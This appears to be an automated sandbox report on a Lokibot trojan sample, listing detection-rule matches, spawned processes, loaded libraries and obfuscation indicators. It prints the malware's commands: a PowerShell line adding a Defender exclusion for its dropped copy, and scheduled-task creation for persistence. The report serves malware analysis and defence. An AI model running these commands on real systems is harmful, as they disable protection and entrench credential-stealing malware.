                      Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: FVR-N2411-07396.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: ZeJFfrYmOnJKS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, apDEs3fGTU4OZfKjCi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, apDEs3fGTU4OZfKjCi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/13@0/1
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 12_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,12_2_0040434D
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA6B9.tmpJump to behavior
                      Source: FVR-N2411-07396.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: FVR-N2411-07396.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: FVR-N2411-07396.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile read: C:\Users\user\Desktop\FVR-N2411-07396.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\FVR-N2411-07396.exe "C:\Users\user\Desktop\FVR-N2411-07396.exe"
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Users\user\Desktop\FVR-N2411-07396.exe "C:\Users\user\Desktop\FVR-N2411-07396.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Users\user\Desktop\FVR-N2411-07396.exe "C:\Users\user\Desktop\FVR-N2411-07396.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                      Source: FVR-N2411-07396.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: FVR-N2411-07396.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: FVR-N2411-07396.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: yRKC.pdbSHA256z3 source: FVR-N2411-07396.exe, ZeJFfrYmOnJKS.exe.0.dr
                      Source: Binary string: yRKC.pdb source: FVR-N2411-07396.exe, ZeJFfrYmOnJKS.exe.0.dr

                      Data Obfuscation

                      barindex
                      Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.cs.Net Code: PA78pcebas System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.cs.Net Code: PA78pcebas System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
